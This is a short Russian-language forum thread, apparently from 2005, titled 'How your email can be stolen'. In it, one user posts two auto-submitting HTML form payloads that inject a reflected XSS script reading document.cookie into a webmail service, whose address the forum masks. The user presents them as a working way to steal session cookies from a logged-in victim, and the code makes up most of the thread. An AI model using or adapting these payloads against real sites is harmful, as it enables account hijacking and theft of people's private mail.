14 мая 2024, 01:18:24

Новости:

Чтобы загрузить изображение нужно нажать кнопку "ПРЕДВАРИТЕЛЬНЫЙ ПРОСМОТР".


Как у вас могут украсть мыло

Автор VGS_mixer, 01 января 2005, 16:03:58

0 Пользователей и 1 гость просматривают эту тему.

VGS_mixer

Работает реально, по крайней мере на [Для просмотра ссылки зарегистрируйтесь]

ХУЛИГАН

ЦитироватьМожно спокойно своровать кукисы, пока человек находится на своём ящике

Вот,про это расскажи,уж очень интересно знать.... ;)

VGS_mixer

<form method="POST" action="[Для просмотра ссылки зарегистрируйтесь];
name="explForm">
<input type=hidden name=q
value="<script>alert(document.cookie)</script>">
</form>
<script language="Javascript">
setTimeout('explForm.submit()', 1);
</script>
(эт XSS)

<form method="POST" action="[Для просмотра ссылки зарегистрируйтесь];
name="explForm">
<input type=hidden name=q
value="<script>alert (document.cookie)</script>">
</form>
<script language="Javascript">
[Для просмотра ссылки зарегистрируйтесь]("[Для просмотра ссылки зарегистрируйтесь];);
setTimeout('explForm.submit()', 1000*30);
</script>
(а это POST)

ХУЛИГАН

У...вот с этой фичей не просёк :( ,придётся подумать!!! :)  



По всем вопросам пишите по адресу gratispp@mail.ru